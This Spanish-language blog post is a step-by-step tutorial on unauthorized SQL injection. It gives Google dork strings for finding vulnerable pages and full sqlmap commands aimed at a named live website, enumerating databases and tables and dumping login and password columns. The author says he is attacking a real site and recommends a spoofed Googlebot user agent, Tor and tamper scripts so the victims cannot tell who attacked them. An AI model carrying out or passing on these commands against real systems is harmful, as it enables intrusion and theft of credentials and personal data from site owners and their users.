[Imagen: 1.png]

Código:
inurl:item_id=
inurl:review.php?id=
inurl:hosting_info.php?id=
inurl:newsid=
inurl:iniziativa.php?in=
inurl:gallery.php?id=


Luego de ésto, vamos ahora sí a utilizar sqlmap, también puede ser utilizada en windows, sólo se necesita tener Python instalado, pero en mi caso utilizaré Parrot.

Página oficial de sqlmap: http://sqlmap.org/

Una vez comprobado que la página es vulnerable, nos dirigimos a una consola y con el enlace de la página copiado hacemos lo siguiente:

sqlmap -u http://www.icdcprague.org/index.php?id=10%27 --dbs --user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"

[Imagen: 2.p%5B1%5D.png]

En mi caso estoy atacando una web de cuba bastante fácil, por lo que será rápido y sin ningún problema el ataque.
-u  Con esto especificamos el url a atacar.
--dbs Con esto sacamos solamente la base de datos
--user-agent Nos sirve para "camuflar" el ataque, es bastante recomendable utilizarlo ya que al atacar una página dejamos archivos que nos delatan, lo cual puede ser un gran problema si queremos atacar una página en la que no queramos que sepan que fuimos nosotros.

Otros comandos que recomiendo usar para facilitar el ataque y que sea más preciso son:

--level=5 Indica el nivel de ataque, por defecto 1
--risk = 3 Indica el nivel de riesgo, por defecto 1
--random-agent Es parecido al user-agent, pero éste lo hace aleatoriamente
--tor Usa tor para las peticiones
--hex Transforma las peticiones a hexadecimal
--tamper Éste comando sirve para hacer un bypass a los servidores, tiene muchas opciones así que les dejo un enlace para que vean cual les puede servir: https://underc0de.org/foro/pentest/bypas...ap-tamper/
-h Nos lista todos, o la mayoría de los comandos de sqlmap, con una pequeña descripción
--dump-all Nos arrojará toda la información directamente (dbs, tablas, columnas y datos)

Por lo general les pide confirmaciones (Y o N), según lo que nos diga le especificamos la opción.

[Imagen: 3.png]

Como vemos, aquí nos mostró todas las bases de datos que contiene la página. Ahora para listar las tablas de dicha base hacemos lo siguiente, teniendo en cuenta los comandos anteriormente mencionados, lo cuales les recomiendo utilizar para que sea más efectivo el ataque.

sqlmap -u http://www.icdcprague.org/index.php?id=10%27 -D icdcprague --tables --level=5 --risk=3 --user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"

[Imagen: 4.png]

Como vemos he cambiado el --dbs por -D, esto se hace cuando ya se conoce el nombre de la db, lo mismo con las tablas y columnas, además, también añadí los comandos level y risk para hacer más rápido el ataque.

--tables Funciona para sacar las tablas de la db ya especificada

[Imagen: 5.png]

Como podemos ver, ya nos sacó las tablas, en total 101 tablas, el algunos casos, como me pasó a mí, sqlmap va a tener que hacer una evaluación para sacar las tablas, esto puede tardar, pero es lo más acertado.

Ahora sólo queda sacar las columnas, para ello usamos lo siguiente:

sqlmap -u http://www.icdcprague.org/index.php?id=10%27 -D icdcprague -T EMPLEADO --columns --level=5 --risk=3 --user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"

[Imagen: 6.png]

Cambiamos --tables por -T, y añadimos el nombre de la tabla que queramos sacarle las columnas

--columns Nos permite sacar los nombres de las columnas y el tipo (ej: numérico o de texto)

[Imagen: 7.png]

Aquí, al igual que al sacar las tablas, también tenemos que hacer una evaluación. Al finalizar como vemos nos muestra todas las columnas de la tabla, ahora sólo restaría sacar los datos de las columnas.

Para sacar los datos de las columnas vamos a hacer lo siguiente:

#sqlmap -u http://www.icdcprague.org/index.php?id=10%27 -D icdcprague -T EMPLEADO -C account,category_img, login_pw --dump  --level=5 --risk=3 --user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"

-C Acá seleccionamos todas las columnas que queremos sacar separadas por comas
--dump Nos permitirá sacar los datos que hallamos seleccionado, no sólo sirve para las columnas, sino también para las tablas

[Imagen: 8.png]

Ya luego de ésto tendremos todos los datos de las columnas que hallamos especificado, haciendo ésto podríamos encontrar datos importantes como credenciales de los administradores, información de los usuarios (desde contraseñas, hasta cuentas bancarias y tarjetas), y más, así que les invito a que sean precavidos a la hora de hacer cosas como éstas.

Espero que les halla servido, les invito a que investiguen más a fondo, ya que esto sólo es lo básico, aquí les dejo más información que les puede ser útil.

https://mega.nz/#!5RFCRYjQ!BPkTEaMY2D8Ub...uhgWKvNuXc
http://blog.elhacker.net/2014/06/sqlmap-...ction.html
http://www.htforos.com/hacking-cracking/...t3467.html

Comentarios

Entradas populares de este blog

DriverPack Solution v17.6.13 / v16.5 / v15.12